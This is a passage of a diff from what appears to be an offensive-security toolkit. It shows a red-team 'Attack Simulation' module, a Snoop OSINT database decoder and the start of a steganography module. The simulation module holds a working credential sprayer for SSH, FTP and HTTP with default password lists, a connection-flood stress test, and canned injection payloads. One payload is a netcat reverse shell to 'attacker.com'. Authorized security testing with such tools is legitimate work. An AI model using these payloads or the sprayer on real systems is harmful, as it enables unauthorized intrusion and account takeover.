            sock.send(b"HEAD / HTTP/1.1\r\nHost: " + target.encode() + b"\r\n\r\n")
        else:
            # Most line-based services (FTP/SMTP/SSH) volunteer a banner.
            sock.send(b"\r\n")
        banner = sock.recv(1024).decode('utf-8', errors='ignore')
        sock.close()
        if banner:
            print(f"{Colors.GREEN}Banner:{Colors.RESET}")
            for line in banner.split('\n')[:15]:
                print(f" {line.strip()}")
        else:
            print(f"{Colors.YELLOW}No banner received{Colors.RESET}")
    except socket.timeout:
        self.print_status("Connection timed out", "warning")
    except ConnectionRefusedError:
        self.print_status("Connection refused", "error")
    except Exception as e:
        self.print_status(f"Error: {e}", "error")
def payload_generator(self):
    """Generate various payloads for testing.

    Presents a menu of payload families (XSS, SQLi, command injection,
    path traversal, SSTI) and prints a numbered list of canned test
    strings for the chosen family. The payload strings below are test
    fixtures — do not alter them.
    """
    print(f"\n{Colors.BOLD}Payload Generator{Colors.RESET}")
    print(f"{Colors.DIM}Generate test payloads for security testing{Colors.RESET}\n")
    print(f" {Colors.YELLOW}[1]{Colors.RESET} XSS Payloads")
    print(f" {Colors.YELLOW}[2]{Colors.RESET} SQL Injection Payloads")
    print(f" {Colors.YELLOW}[3]{Colors.RESET} Command Injection Payloads")
    print(f" {Colors.YELLOW}[4]{Colors.RESET} Path Traversal Payloads")
    print(f" {Colors.YELLOW}[5]{Colors.RESET} SSTI Payloads")
    print()
    choice = input(f"{Colors.WHITE}Select payload type: {Colors.RESET}").strip()
    payloads = {
        "1": [ # XSS
            '<script>alert(1)</script>',
            '<img src=x onerror=alert(1)>',
            '<svg onload=alert(1)>',
            '"><script>alert(1)</script>',
            "'-alert(1)-'",
            '<body onload=alert(1)>',
            '{{constructor.constructor("alert(1)")()}}',
        ],
        "2": [ # SQLi
            "' OR '1'='1",
            "' OR '1'='1' --",
            "'; DROP TABLE users; --",
            "1' ORDER BY 1--",
            "1 UNION SELECT null,null,null--",
            "' AND 1=1 --",
            "admin'--",
        ],
        "3": [ # Command Injection
            "; ls -la",
            "| cat /etc/passwd",
            "& whoami",
            "`id`",
            "$(whoami)",
            "; ping -c 3 127.0.0.1",
            "| nc -e /bin/sh attacker.com 4444",
        ],
        "4": [ # Path Traversal
            "../../../etc/passwd",
            "..\\..\\..\\windows\\system32\\config\\sam",
            "....//....//....//etc/passwd",
            "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd",
            "..%252f..%252f..%252fetc/passwd",
            "/etc/passwd%00",
        ],
        "5": [ # SSTI
            "{{7*7}}",
            "${7*7}",
            "{{config}}",
            "{{self.__class__.__mro__}}",
            "<%= 7*7 %>",
            "{{request.application.__globals__}}",
        ],
    }
    # Unknown choices fall through silently (no output).
    if choice in payloads:
        names = {
            "1": "XSS", "2": "SQL Injection", "3": "Command Injection",
            "4": "Path Traversal", "5": "SSTI"
        }
        print(f"\n{Colors.CYAN}{names[choice]} Payloads:{Colors.RESET}\n")
        for i, payload in enumerate(payloads[choice], 1):
            print(f" [{i}] {payload}")
def network_stress(self):
    """Network stress test (controlled).

    Repeatedly opens TCP connections to a target and writes 1 KiB per
    connection for a capped duration (max 30s). Requires explicit
    'yes' confirmation before running.
    """
    print(f"\n{Colors.BOLD}Network Stress Test{Colors.RESET}")
    print(f"{Colors.RED}WARNING: Only use on systems you own or have permission to test!{Colors.RESET}\n")
    target = input(f"{Colors.WHITE}Enter target IP: {Colors.RESET}").strip()
    port = input(f"{Colors.WHITE}Enter target port: {Colors.RESET}").strip()
    duration = input(f"{Colors.WHITE}Duration in seconds [5]: {Colors.RESET}").strip() or "5"
    if not target or not port:
        return
    try:
        port = int(port)
        duration = int(duration)
        # Hard safety cap on run time.
        if duration > 30:
            duration = 30
            print(f"{Colors.YELLOW}Limited to 30 seconds max{Colors.RESET}")
    except:
        self.print_status("Invalid input", "error")
        return
    confirm = input(f"\n{Colors.YELLOW}Start stress test against {target}:{port} for {duration}s? (yes/no): {Colors.RESET}").strip()
    if confirm.lower() != 'yes':
        return
    print(f"\n{Colors.CYAN}Starting stress test...{Colors.RESET}")
    import time  # NOTE(review): time is already imported at module level; local import kept as-is
    start_time = time.time()
    connections = 0
    errors = 0
    while time.time() - start_time < duration:
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(1)
            sock.connect((target, port))
            sock.send(b"X" * 1024)
            sock.close()
            connections += 1
        except:
            errors += 1
        # Progress line refreshed every 100 successful connections.
        if connections % 100 == 0:
            print(f"\r{Colors.DIM}Connections: {connections}, Errors: {errors}{Colors.RESET}", end="")
    print(f"\n\n{Colors.GREEN}Test complete:{Colors.RESET}")
    print(f" Connections attempted: {connections}")
    print(f" Errors: {errors}")
    print(f" Duration: {duration}s")
# ==================== CREDENTIAL SPRAYER ====================
# Built-in top-20 usernames offered by credential_sprayer().
DEFAULT_USERNAMES = [
    'admin', 'root', 'user', 'test', 'guest', 'administrator', 'ftp',
    'www', 'postgres', 'mysql', 'oracle', 'backup', 'operator', 'info',
    'support', 'webmaster', 'demo', 'pi', 'ubuntu', 'deploy',
]
# Built-in top-20 weak passwords offered by credential_sprayer().
DEFAULT_PASSWORDS = [
    'password', '123456', 'admin', 'root', 'letmein', 'welcome',
    'changeme', 'test', 'guest', 'default', 'pass', 'qwerty',
    '123456789', 'password1', '12345678', '1234', 'abc123',
    'monkey', 'master', 'dragon',
]
def credential_sprayer(self):
    """Credential spraying against network services.

    Interactive workflow: pick a protocol (SSH / FTP / HTTP Basic), a
    target, then username and password sources (built-in list, manual
    entry, or file). After explicit 'yes' confirmation the spray runs
    via _run_spray() and valid credentials are summarized.
    """
    print(f"\n{Colors.BOLD}Credential Sprayer{Colors.RESET}")
    print(f"{Colors.RED}WARNING: Only use on systems you own or have explicit authorization to test!{Colors.RESET}")
    print(f"{Colors.DIM}Test common credentials against network services{Colors.RESET}")
    print(f"{Colors.CYAN}{'' * 50}{Colors.RESET}\n")
    # Protocol selection
    print(f" {Colors.YELLOW}[1]{Colors.RESET} SSH")
    print(f" {Colors.YELLOW}[2]{Colors.RESET} FTP")
    print(f" {Colors.YELLOW}[3]{Colors.RESET} HTTP Basic Auth")
    print()
    proto_choice = input(f"{Colors.WHITE}Select protocol: {Colors.RESET}").strip()
    protocols = {'1': 'ssh', '2': 'ftp', '3': 'http'}
    protocol = protocols.get(proto_choice)
    if not protocol:
        return
    default_ports = {'ssh': '22', 'ftp': '21', 'http': '80'}
    target = input(f"{Colors.WHITE}Target IP/hostname: {Colors.RESET}").strip()
    if not target:
        return
    port = input(f"{Colors.WHITE}Port [{Colors.GREEN}{default_ports[protocol]}{Colors.WHITE}]: {Colors.RESET}").strip() or default_ports[protocol]
    try:
        port = int(port)
    except ValueError:
        self.print_status("Invalid port", "error")
        return
    # Username source
    print(f"\n{Colors.CYAN}Username source:{Colors.RESET}")
    print(f" {Colors.YELLOW}[1]{Colors.RESET} Built-in top 20")
    print(f" {Colors.YELLOW}[2]{Colors.RESET} Manual entry")
    print(f" {Colors.YELLOW}[3]{Colors.RESET} File")
    user_choice = input(f"{Colors.WHITE}Select: {Colors.RESET}").strip()
    usernames = []
    if user_choice == '1':
        # Copy so the shared class-level list is never mutated.
        usernames = self.DEFAULT_USERNAMES[:]
    elif user_choice == '2':
        user_input = input(f"{Colors.WHITE}Usernames (comma-separated): {Colors.RESET}").strip()
        usernames = [u.strip() for u in user_input.split(',') if u.strip()]
    elif user_choice == '3':
        filepath = input(f"{Colors.WHITE}Username file path: {Colors.RESET}").strip()
        try:
            with open(filepath, 'r') as f:
                usernames = [line.strip() for line in f if line.strip()]
        except Exception as e:
            self.print_status(f"Error reading file: {e}", "error")
            return
    if not usernames:
        self.print_status("No usernames provided", "error")
        return
    # Password source
    print(f"\n{Colors.CYAN}Password source:{Colors.RESET}")
    print(f" {Colors.YELLOW}[1]{Colors.RESET} Built-in top 20")
    print(f" {Colors.YELLOW}[2]{Colors.RESET} Manual entry")
    print(f" {Colors.YELLOW}[3]{Colors.RESET} File")
    pass_choice = input(f"{Colors.WHITE}Select: {Colors.RESET}").strip()
    passwords = []
    if pass_choice == '1':
        passwords = self.DEFAULT_PASSWORDS[:]
    elif pass_choice == '2':
        pass_input = input(f"{Colors.WHITE}Passwords (comma-separated): {Colors.RESET}").strip()
        passwords = [p.strip() for p in pass_input.split(',') if p.strip()]
    elif pass_choice == '3':
        filepath = input(f"{Colors.WHITE}Password file path: {Colors.RESET}").strip()
        try:
            with open(filepath, 'r') as f:
                passwords = [line.strip() for line in f if line.strip()]
        except Exception as e:
            self.print_status(f"Error reading file: {e}", "error")
            return
    if not passwords:
        self.print_status("No passwords provided", "error")
        return
    # Delay and confirmation
    delay = input(f"{Colors.WHITE}Delay between attempts (seconds) [{Colors.GREEN}1.0{Colors.WHITE}]: {Colors.RESET}").strip() or "1.0"
    try:
        delay = max(0.5, float(delay)) # Enforce minimum 0.5s
    except ValueError:
        delay = 1.0
    total_combos = len(usernames) * len(passwords)
    est_time = total_combos * delay
    print(f"\n{Colors.CYAN}{'' * 50}{Colors.RESET}")
    print(f" Protocol: {protocol.upper()}")
    print(f" Target: {target}:{port}")
    print(f" Usernames: {len(usernames)}")
    print(f" Passwords: {len(passwords)}")
    print(f" Combinations: {total_combos}")
    print(f" Delay: {delay}s")
    print(f" Est. time: {int(est_time)}s ({int(est_time/60)}m)")
    print(f"{Colors.CYAN}{'' * 50}{Colors.RESET}")
    confirm = input(f"\n{Colors.YELLOW}Start credential spray? (yes/no): {Colors.RESET}").strip().lower()
    if confirm != 'yes':
        return
    results = self._run_spray(protocol, target, port, usernames, passwords, delay)
    # Summary
    print(f"\n{Colors.CYAN}{'' * 50}{Colors.RESET}")
    print(f"{Colors.BOLD}Spray Complete{Colors.RESET}")
    print(f" Attempts: {total_combos}")
    print(f" Successes: {Colors.GREEN}{len(results)}{Colors.RESET}")
    if results:
        print(f"\n{Colors.GREEN}Valid Credentials:{Colors.RESET}")
        for r in results:
            print(f" {Colors.GREEN}[+]{Colors.RESET} {r['user']}:{r['password']}")
def _spray_ssh(self, target: str, port: int, user: str, password: str) -> bool:
"""Try SSH login with given credentials."""
try:
import paramiko
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(target, port=port, username=user, password=password, timeout=5,
allow_agent=False, look_for_keys=False)
client.close()
return True
except ImportError:
# Fallback to sshpass
success, _ = self.run_cmd(
f"sshpass -p '{password}' ssh -o StrictHostKeyChecking=no -o ConnectTimeout=5 -p {port} {user}@{target} exit",
timeout=10
)
return success
except:
return False
def _spray_ftp(self, target: str, port: int, user: str, password: str) -> bool:
"""Try FTP login with given credentials."""
try:
ftp = ftplib.FTP()
ftp.connect(target, port, timeout=5)
ftp.login(user, password)
ftp.quit()
return True
except:
return False
def _spray_http_basic(self, target: str, port: int, user: str, password: str) -> bool:
"""Try HTTP Basic Auth with given credentials."""
try:
url = f"http://{target}:{port}/"
credentials = base64.b64encode(f"{user}:{password}".encode()).decode()
req = urllib.request.Request(url, headers={
'Authorization': f'Basic {credentials}',
'User-Agent': 'Mozilla/5.0',
})
with urllib.request.urlopen(req, timeout=5) as response:
return response.getcode() not in [401, 403]
except urllib.error.HTTPError as e:
return e.code not in [401, 403]
except:
return False
    def _run_spray(self, protocol: str, target: str, port: int,
                   usernames: list, passwords: list, delay: float = 1.0) -> list:
        """Execute the credential spray.

        Tries every username/password combination via the protocol-specific
        single-attempt helper, sleeping ``delay`` seconds between attempts.

        Args:
            protocol: One of 'ssh', 'ftp' or 'http'.
            target: Hostname or IP to attack.
            port: Service port.
            usernames: Candidate usernames.
            passwords: Candidate passwords.
            delay: Seconds to sleep between attempts (rate limiting).

        Returns:
            List of ``{'user': ..., 'password': ...}`` dicts for each
            successful login; empty list for an unsupported protocol.
        """
        # Dispatch table: protocol name -> single-attempt login function.
        spray_funcs = {
            'ssh': self._spray_ssh,
            'ftp': self._spray_ftp,
            'http': self._spray_http_basic,
        }
        spray_func = spray_funcs.get(protocol)
        if not spray_func:
            self.print_status(f"Unsupported protocol: {protocol}", "error")
            return []
        successes = []
        attempt = 0
        # Hard safety cap so a huge wordlist cannot run indefinitely.
        max_attempts = 500
        print(f"\n{Colors.CYAN}Starting spray...{Colors.RESET}\n")
        for user in usernames:
            for password in passwords:
                attempt += 1
                if attempt > max_attempts:
                    self.print_status(f"Max attempts ({max_attempts}) reached", "warning")
                    return successes
                # \r keeps progress on one line; password preview capped at 15 chars.
                print(f"\r{Colors.DIM}  [{attempt}] Trying {user}:{password[:15]}...{Colors.RESET}", end='', flush=True)
                try:
                    result = spray_func(target, port, user, password)
                    if result:
                        print(f"\r{' ' * 60}\r  {Colors.GREEN}[+] SUCCESS: {user}:{password}{Colors.RESET}")
                        successes.append({'user': user, 'password': password})
                except:
                    # Best-effort: an errored attempt is simply treated as a miss.
                    pass
                time.sleep(delay)
        # Clear the progress line before returning.
        print(f"\r{' ' * 60}\r", end='')
        return successes
def show_menu(self):
clear_screen()
display_banner()
print(f"{Colors.YELLOW}{Colors.BOLD} Attack Simulation{Colors.RESET}")
print(f"{Colors.DIM} Red team exercises and testing{Colors.RESET}")
print(f"{Colors.DIM} {'' * 50}{Colors.RESET}")
print()
print(f" {Colors.YELLOW}[1]{Colors.RESET} Password Audit")
print(f" {Colors.YELLOW}[2]{Colors.RESET} Port Scanner")
print(f" {Colors.YELLOW}[3]{Colors.RESET} Banner Grabber")
print(f" {Colors.YELLOW}[4]{Colors.RESET} Payload Generator")
print(f" {Colors.YELLOW}[5]{Colors.RESET} Network Stress Test")
print(f" {Colors.YELLOW}[6]{Colors.RESET} Credential Sprayer")
print()
print(f" {Colors.DIM}[0]{Colors.RESET} Back")
print()
def run(self):
while True:
self.show_menu()
try:
choice = input(f"{Colors.WHITE} Select: {Colors.RESET}").strip()
if choice == "0":
break
elif choice == "1":
self.password_audit()
elif choice == "2":
self.port_scanner()
elif choice == "3":
self.banner_grabber()
elif choice == "4":
self.payload_generator()
elif choice == "5":
self.network_stress()
elif choice == "6":
self.credential_sprayer()
if choice in ["1", "2", "3", "4", "5", "6"]:
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
except (EOFError, KeyboardInterrupt):
break
def run():
    """Module entry point: launch the Attack Simulation menu loop."""
    Simulator().run()
# Allow running this module directly as a script.
if __name__ == "__main__":
    run()

1502
modules/sms_forge.py Normal file

File diff suppressed because it is too large Load Diff

400
modules/snoop_decoder.py Normal file
View File

@@ -0,0 +1,400 @@
"""
AUTARCH Snoop Database Decoder Module
Decrypts and imports Snoop Project databases into AUTARCH
"""
import base64
import json
import os
import sys
from pathlib import Path
# Add parent directory to path for imports
sys.path.insert(0, str(Path(__file__).parent.parent))
from core.banner import Colors
from core.sites_db import SitesDatabase
# Module metadata
NAME = "Snoop Decoder"
DESCRIPTION = "Decrypt and import Snoop Project databases"
AUTHOR = "darkHal Security Group"
VERSION = "1.0"
CATEGORY = "osint"
class SnoopDecoder:
    """Decoder for Snoop Project encoded databases.

    The Snoop "BD*" files are JSON payloads obfuscated as:
    reversed string -> UTF-8 bytes -> reversed bytes -> base32 text.
    decode_database() undoes those steps; import_to_database() maps the
    decoded entries into AUTARCH's sites database.
    """
    def __init__(self):
        # Destination DB handle plus a directory for decoded JSON dumps.
        self.sites_db = SitesDatabase()
        from core.paths import get_data_dir
        self.data_dir = get_data_dir() / "sites"
        self.data_dir.mkdir(parents=True, exist_ok=True)
    def decode_database(self, filepath: str) -> dict:
        """Decode a Snoop database file.

        Args:
            filepath: Path to the encoded database file (BDdemo, BDfull, etc.)

        Returns:
            Decoded dictionary of sites, or None when base32 decoding or
            JSON parsing fails.
        """
        print(f"{Colors.CYAN}[*] Reading encoded database...{Colors.RESET}")
        with open(filepath, 'r', encoding='utf8') as f:
            db = f.read().strip()
        original_size = len(db)
        print(f"{Colors.DIM}    Original size: {original_size:,} chars{Colors.RESET}")
        # Step 1: Decode base32
        print(f"{Colors.CYAN}[*] Decoding base32...{Colors.RESET}")
        try:
            db_bytes = base64.b32decode(db)
        except Exception as e:
            print(f"{Colors.RED}[X] Base32 decode failed: {e}{Colors.RESET}")
            return None
        print(f"{Colors.DIM}    After base32: {len(db_bytes):,} bytes{Colors.RESET}")
        # Step 2: Reverse bytes
        print(f"{Colors.CYAN}[*] Reversing byte order...{Colors.RESET}")
        db_bytes = db_bytes[::-1]
        # Step 3: Decode UTF-8 with error handling (errors='replace' keeps
        # going on malformed sequences rather than aborting the decode)
        print(f"{Colors.CYAN}[*] Decoding UTF-8...{Colors.RESET}")
        content = db_bytes.decode('utf-8', errors='replace')
        # Step 4: Reverse string
        print(f"{Colors.CYAN}[*] Reversing string...{Colors.RESET}")
        content = content[::-1]
        # Step 5: Parse JSON
        print(f"{Colors.CYAN}[*] Parsing JSON...{Colors.RESET}")
        try:
            data = json.loads(content)
        except json.JSONDecodeError as e:
            print(f"{Colors.RED}[X] JSON parse failed: {e}{Colors.RESET}")
            return None
        print(f"{Colors.GREEN}[+] Successfully decoded {len(data):,} sites!{Colors.RESET}")
        return data
    def save_decoded(self, data: dict, output_name: str = "snoop_decoded.json") -> str:
        """Save decoded database to JSON file under ``self.data_dir``.

        Args:
            data: Decoded site dictionary.
            output_name: Output filename.

        Returns:
            Path to saved file (as a string).
        """
        output_path = self.data_dir / output_name
        with open(output_path, 'w', encoding='utf8') as f:
            json.dump(data, f, indent=2, ensure_ascii=False)
        size_mb = output_path.stat().st_size / 1024 / 1024
        print(f"{Colors.GREEN}[+] Saved to: {output_path}{Colors.RESET}")
        print(f"{Colors.DIM}    File size: {size_mb:.2f} MB{Colors.RESET}")
        return str(output_path)
    def import_to_database(self, data: dict) -> dict:
        """Import decoded Snoop data into AUTARCH sites database.

        Entries that are not dicts, or whose URL lacks a ``{}`` username
        placeholder, are skipped.

        Args:
            data: Decoded site dictionary.

        Returns:
            Import statistics as returned by ``add_sites_bulk``.
        """
        print(f"\n{Colors.CYAN}[*] Importing to AUTARCH database...{Colors.RESET}")
        sites_to_add = []
        skipped = 0
        for name, entry in data.items():
            if not isinstance(entry, dict):
                skipped += 1
                continue
            url = entry.get('url', '')
            if not url or '{}' not in url:
                skipped += 1
                continue
            # Get error type - handle encoding issues in key name
            # (mojibake from the decode step can corrupt the 'errorType' key,
            # so match on substrings instead of an exact key lookup)
            error_type = None
            for key in entry.keys():
                if 'errorTyp' in key or 'errortype' in key.lower():
                    error_type = entry[key]
                    break
            # Map Snoop error types to detection methods
            detection_method = 'status'
            if error_type:
                if 'message' in str(error_type).lower():
                    detection_method = 'content'
                elif 'redirect' in str(error_type).lower():
                    detection_method = 'redirect'
            # Get error message pattern
            error_pattern = None
            for key in ['errorMsg', 'errorMsg2']:
                if key in entry and entry[key]:
                    error_pattern = str(entry[key])
                    break
            sites_to_add.append({
                'name': name,
                'url_template': url,
                'url_main': entry.get('urlMain'),
                'detection_method': detection_method,
                'error_pattern': error_pattern,
                'category': 'other',
                'nsfw': 0,
            })
        print(f"{Colors.DIM}    Valid sites: {len(sites_to_add):,}{Colors.RESET}")
        print(f"{Colors.DIM}    Skipped: {skipped:,}{Colors.RESET}")
        # Add to database
        stats = self.sites_db.add_sites_bulk(sites_to_add)
        print(f"{Colors.GREEN}[+] Import complete!{Colors.RESET}")
        print(f"{Colors.DIM}    Added: {stats['added']:,}{Colors.RESET}")
        print(f"{Colors.DIM}    Errors: {stats['errors']:,}{Colors.RESET}")
        return stats
    def show_sample(self, data: dict, count: int = 10):
        """Display sample sites from decoded database.

        Args:
            data: Decoded site dictionary.
            count: Number of samples to show.
        """
        print(f"\n{Colors.CYAN}Sample Sites ({count}):{Colors.RESET}")
        print("-" * 60)
        for i, (name, info) in enumerate(list(data.items())[:count]):
            url = info.get('url', 'N/A')
            country = info.get('country', '')
            print(f"  {country} {Colors.GREEN}{name}{Colors.RESET}")
            # Truncate long URLs to keep the listing on one line each.
            print(f"     {Colors.DIM}{url[:55]}...{Colors.RESET}" if len(url) > 55 else f"     {Colors.DIM}{url}{Colors.RESET}")
    def get_stats(self, data: dict) -> dict:
        """Get statistics about decoded database.

        Args:
            data: Decoded site dictionary.

        Returns:
            Statistics dictionary with total count, per-country counts and
            detection-method counts.
        """
        stats = {
            'total_sites': len(data),
            'by_country': {},
            'detection_methods': {'status_code': 0, 'message': 0, 'redirection': 0, 'other': 0},
        }
        for name, info in data.items():
            # Country stats
            # NOTE(review): show_sample() reads 'country' while this reads
            # 'country_klas' — presumably both exist in Snoop entries; verify.
            country = info.get('country_klas', 'Unknown')
            stats['by_country'][country] = stats['by_country'].get(country, 0) + 1
            # Detection method stats
            error_type = None
            for key in info.keys():
                if 'errorTyp' in key:
                    error_type = str(info[key]).lower()
                    break
            if error_type:
                if 'status' in error_type:
                    stats['detection_methods']['status_code'] += 1
                elif 'message' in error_type:
                    stats['detection_methods']['message'] += 1
                elif 'redirect' in error_type:
                    stats['detection_methods']['redirection'] += 1
                else:
                    stats['detection_methods']['other'] += 1
            else:
                stats['detection_methods']['other'] += 1
        return stats
def display_menu():
    """Display the Snoop Decoder menu.

    Rendered as a single triple-quoted f-string so the layout (indentation
    and blank lines) is part of the output itself.
    """
    print(f"""
{Colors.CYAN} Snoop Database Decoder{Colors.RESET}
{Colors.DIM} Decrypt and import Snoop Project databases{Colors.RESET}
{Colors.DIM}{'' * 50}{Colors.RESET}
 {Colors.GREEN}[1]{Colors.RESET} Decode Snoop Database File
 {Colors.GREEN}[2]{Colors.RESET} Decode & Import to AUTARCH
 {Colors.GREEN}[3]{Colors.RESET} View Current Sites Database Stats
 {Colors.GREEN}[4]{Colors.RESET} Quick Import (BDfull from snoop-master)
 {Colors.GREEN}[5]{Colors.RESET} Quick Import (BDdemo from snoop-master)
 {Colors.RED}[0]{Colors.RESET} Back to OSINT Menu
""")
def get_file_path() -> str:
    """Ask the user for the path to a Snoop database file.

    Returns:
        The path string when it exists on disk; None when the input was
        empty or the file was not found (an error is printed in the
        latter case).
    """
    print(f"\n{Colors.CYAN}Enter path to Snoop database file:{Colors.RESET}")
    print(f"{Colors.DIM}(e.g., /path/to/BDfull or /path/to/BDdemo){Colors.RESET}")
    chosen = input(f"\n{Colors.GREEN}Path: {Colors.RESET}").strip()
    if chosen and os.path.exists(chosen):
        return chosen
    if chosen:
        print(f"{Colors.RED}[X] File not found: {chosen}{Colors.RESET}")
    return None
def run():
    """Main entry point for the module.

    Interactive loop: decode a Snoop DB, optionally import it into the
    AUTARCH sites database, show stats, or quick-import the bundled
    BDfull/BDdemo files from known locations.
    """
    decoder = SnoopDecoder()
    # Common paths for Snoop databases (app-dir checkout first, then data dir)
    from core.paths import get_app_dir, get_data_dir
    _app = get_app_dir()
    _data = get_data_dir()
    snoop_paths = {
        'bdfull': _app / "snoop" / "snoop-master" / "BDfull",
        'bddemo': _app / "snoop" / "snoop-master" / "BDdemo",
        'bdfull_alt': _data / "snoop" / "BDfull",
        'bddemo_alt': _data / "snoop" / "BDdemo",
    }
    while True:
        display_menu()
        choice = input(f"{Colors.GREEN}Select option: {Colors.RESET}").strip()
        if choice == '0':
            break
        elif choice == '1':
            # Decode only
            filepath = get_file_path()
            if not filepath:
                continue
            data = decoder.decode_database(filepath)
            if data:
                decoder.show_sample(data)
                stats = decoder.get_stats(data)
                print(f"\n{Colors.CYAN}Database Statistics:{Colors.RESET}")
                print(f"  Total sites: {stats['total_sites']:,}")
                print(f"  Detection methods: {stats['detection_methods']}")
                print(f"  Top countries: {dict(sorted(stats['by_country'].items(), key=lambda x: -x[1])[:10])}")
                # Ask to save
                save = input(f"\n{Colors.YELLOW}Save decoded JSON? (y/n): {Colors.RESET}").strip().lower()
                if save == 'y':
                    name = input(f"{Colors.GREEN}Output filename [snoop_decoded.json]: {Colors.RESET}").strip()
                    decoder.save_decoded(data, name if name else "snoop_decoded.json")
        elif choice == '2':
            # Decode and import
            filepath = get_file_path()
            if not filepath:
                continue
            data = decoder.decode_database(filepath)
            if data:
                decoder.show_sample(data, 5)
                confirm = input(f"\n{Colors.YELLOW}Import {len(data):,} sites to AUTARCH? (y/n): {Colors.RESET}").strip().lower()
                if confirm == 'y':
                    # Save first
                    decoder.save_decoded(data, "snoop_imported.json")
                    # Then import
                    decoder.import_to_database(data)
                    # Show final stats
                    db_stats = decoder.sites_db.get_stats()
                    print(f"\n{Colors.GREEN}AUTARCH Database now has {db_stats['total_sites']:,} sites!{Colors.RESET}")
        elif choice == '3':
            # View current stats
            stats = decoder.sites_db.get_stats()
            print(f"\n{Colors.CYAN}AUTARCH Sites Database:{Colors.RESET}")
            print(f"  Total sites: {stats['total_sites']:,}")
            print(f"  NSFW sites: {stats['nsfw_sites']:,}")
            print(f"  Database size: {stats['db_size_mb']:.2f} MB")
            print(f"\n  {Colors.CYAN}By Source:{Colors.RESET}")
            for source, count in sorted(stats['by_source'].items(), key=lambda x: -x[1]):
                print(f"    {source}: {count:,}")
            input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
        elif choice == '4':
            # Quick import BDfull — first existing known location wins
            bdpath = None
            for key in ['bdfull', 'bdfull_alt']:
                if snoop_paths[key].exists():
                    bdpath = str(snoop_paths[key])
                    break
            if not bdpath:
                print(f"{Colors.RED}[X] BDfull not found in known locations{Colors.RESET}")
                print(f"{Colors.DIM}    Checked: {snoop_paths['bdfull']}{Colors.RESET}")
                print(f"{Colors.DIM}    Checked: {snoop_paths['bdfull_alt']}{Colors.RESET}")
                continue
            print(f"{Colors.GREEN}[+] Found BDfull: {bdpath}{Colors.RESET}")
            data = decoder.decode_database(bdpath)
            if data:
                confirm = input(f"\n{Colors.YELLOW}Import {len(data):,} sites? (y/n): {Colors.RESET}").strip().lower()
                if confirm == 'y':
                    decoder.save_decoded(data, "snoop_full.json")
                    decoder.import_to_database(data)
                    db_stats = decoder.sites_db.get_stats()
                    print(f"\n{Colors.GREEN}AUTARCH Database now has {db_stats['total_sites']:,} sites!{Colors.RESET}")
        elif choice == '5':
            # Quick import BDdemo — same flow as BDfull, smaller dataset
            bdpath = None
            for key in ['bddemo', 'bddemo_alt']:
                if snoop_paths[key].exists():
                    bdpath = str(snoop_paths[key])
                    break
            if not bdpath:
                print(f"{Colors.RED}[X] BDdemo not found in known locations{Colors.RESET}")
                continue
            print(f"{Colors.GREEN}[+] Found BDdemo: {bdpath}{Colors.RESET}")
            data = decoder.decode_database(bdpath)
            if data:
                confirm = input(f"\n{Colors.YELLOW}Import {len(data):,} sites? (y/n): {Colors.RESET}").strip().lower()
                if confirm == 'y':
                    decoder.save_decoded(data, "snoop_demo.json")
                    decoder.import_to_database(data)
                    db_stats = decoder.sites_db.get_stats()
                    print(f"\n{Colors.GREEN}AUTARCH Database now has {db_stats['total_sites']:,} sites!{Colors.RESET}")
        else:
            print(f"{Colors.RED}[!] Invalid option{Colors.RESET}")
# Allow running this module directly as a script.
if __name__ == "__main__":
    run()

1305
modules/social_eng.py Normal file

File diff suppressed because it is too large Load Diff

2349
modules/starlink_hack.py Normal file

File diff suppressed because it is too large Load Diff

769
modules/steganography.py Normal file
View File

@@ -0,0 +1,769 @@
"""AUTARCH Steganography
Image/audio/document steganography — hide data in carrier files using LSB
encoding, DCT domain embedding, and whitespace encoding. Includes detection
via statistical analysis and optional AES-256 encryption.
"""
DESCRIPTION = "Steganography — hide & extract data in files"
AUTHOR = "darkHal"
VERSION = "1.0"
CATEGORY = "counter"
import os
import io
import re
import json
import struct
import hashlib
import secrets
from pathlib import Path
from typing import Dict, List, Optional, Tuple
try:
from core.paths import get_data_dir
except ImportError:
def get_data_dir():
return str(Path(__file__).parent.parent / 'data')
# Optional imports
try:
from PIL import Image
HAS_PIL = True
except ImportError:
HAS_PIL = False
try:
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
HAS_CRYPTO = True
except ImportError:
try:
from Cryptodome.Cipher import AES
from Cryptodome.Util.Padding import pad, unpad
HAS_CRYPTO = True
except ImportError:
HAS_CRYPTO = False
try:
import wave
HAS_WAVE = True
except ImportError:
HAS_WAVE = False
# ── Encryption Layer ─────────────────────────────────────────────────────────
def _derive_key(password: str) -> bytes:
"""Derive 256-bit key from password."""
return hashlib.sha256(password.encode()).digest()
def _encrypt_data(data: bytes, password: str) -> bytes:
    """AES-256-CBC encrypt *data*; the random 16-byte IV is prepended.

    Returns the plaintext unchanged when no crypto backend is installed.
    """
    if not HAS_CRYPTO:
        return data
    iv = secrets.token_bytes(16)
    cipher = AES.new(_derive_key(password), AES.MODE_CBC, iv)
    return iv + cipher.encrypt(pad(data, AES.block_size))
def _decrypt_data(data: bytes, password: str) -> bytes:
    """Inverse of ``_encrypt_data``: strip the 16-byte IV prefix and decrypt.

    Returns *data* unchanged when no crypto backend is installed.
    """
    if not HAS_CRYPTO:
        return data
    iv, ciphertext = data[:16], data[16:]
    cipher = AES.new(_derive_key(password), AES.MODE_CBC, iv)
    return unpad(cipher.decrypt(ciphertext), AES.block_size)
# ── LSB Image Steganography ──────────────────────────────────────────────────
class ImageStego:
    """LSB steganography for PNG/BMP images.

    Payload layout: 4-byte magic + 4-byte big-endian length + payload,
    embedded bit-by-bit (MSB first) into the low bits of each RGB channel.
    """
    MAGIC = b'ASTS'  # AUTARCH Stego Signature
    @staticmethod
    def capacity(image_path: str) -> Dict:
        """Calculate maximum payload capacity in bytes (at 1 bit/channel)."""
        if not HAS_PIL:
            return {'ok': False, 'error': 'Pillow (PIL) not installed'}
        try:
            img = Image.open(image_path)
            w, h = img.size
            channels = len(img.getbands())
            # 1 bit per channel per pixel, minus header
            total_bits = w * h * channels
            total_bytes = total_bits // 8 - 8  # subtract header (magic + length)
            return {
                'ok': True, 'capacity_bytes': max(0, total_bytes),
                'width': w, 'height': h, 'channels': channels,
                'format': img.format
            }
